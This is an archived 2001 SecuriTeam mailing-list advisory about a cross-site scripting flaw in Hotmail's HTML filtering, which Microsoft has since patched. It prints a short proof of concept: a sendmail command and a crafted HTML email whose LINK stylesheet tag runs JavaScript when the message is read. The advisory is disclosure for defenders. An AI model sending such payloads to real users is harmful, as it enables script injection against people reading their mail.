[NEWS] Hotmail LINK CSS Vulnerability (New Strain)

From: support@securiteam.com
Date: 08/26/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [NEWS] Hotmail LINK CSS Vulnerability (New Strain)
Message-Id: <20010826061009.5D53D138BF@mail.der-keiler.de>
Date: Sun, 26 Aug 2001 08:10:09 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Hotmail LINK CSS Vulnerability (New Strain)
------------------------------------------------------------------------

SUMMARY

A new Cross Site Scripting (CSS) vulnerability carriers with it
potentially serious security implications, that go beyond the Microsoft
Hotmail system. This vulnerability and these types of vulnerabilities
(CSS) affect many more HTML aware web applications.

The below Cross Site Scripting vulnerability is believed to be a new
strain of CSS. Web application developers and security engineers are urged
to check and update their current HTML filters in all HTML aware web
applications. This includes Webmail, On-line Auctions, Message Boards,
HTML Chats, Guest Books, etc.

NOTE: Microsoft was advised of this issue Aug 21, 2001 and issued a fix by
Aug 23, 2001. Hotmail is no longer vulnerable to this problem.

DETAILS

This is a simple proof of concept vulnerability that illustrates how the
sending of a crafted HTML email with the enclosed body will auto-execute
JavaScript when the email is read.

** NOTE: Example tested under Netscape 4.77 **

==============================================

* WebMail Example *
sendmail -t <target>@hotmail.com

MIME-Version: 1.0
From: The Attacker <foos@bar.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: LINK TAG JavaScript Execution Example

<HTML><BODY>

<LINK REL=STYLESHEET TYPE="text/javascript" SRC="javascript_path.js">

</BODY></HTML>

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • CERT Advisory CA-2002-04 Buffer Overflow in Microsoft Internet Explorer
    ... Microsoft Internet Explorer contains a buffer overflow vulnerability ... victim's system when the victim visits a web page or views an HTML ... about the patch and the vulnerabilities, please see Microsoft Security ...
    (Cert)
  • CERT Advisory CA-2002-04 Buffer Overflow in Microsoft Internet Explorer
    ... Microsoft Internet Explorer contains a buffer overflow vulnerability ... victim's system when the victim visits a web page or views an HTML ... about the patch and the vulnerabilities, please see Microsoft Security ...
    (Cert)
  • SecurityFocus Microsoft Newsletter #183
    ... Human Nature vs. Security ... MICROSOFT VULNERABILITY SUMMARY ... WebCT Campus Edition HTML Injection Vulnerability ... MPlayer Remote HTTP Header Buffer Overflow Vulnerability ...
    (Focus-Microsoft)
  • Re: CSS, CSS & let me give you some more CSS
    ... Cross-site scripting is an exploit against the Client that exist on the server. ... CSS, CSS & let me give you some more CSS ... >> Just about every siteyou go to has this type of vulnerability, ... >> Digital Security: ...
    (Vuln-Dev)
  • [NT] Buffer Overflow in Microsoft Internet Explorer
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... This vulnerability ... the target visits a web page or views an HTML email message. ... * Microsoft Outlook and Outlook Express ...
    (Securiteam)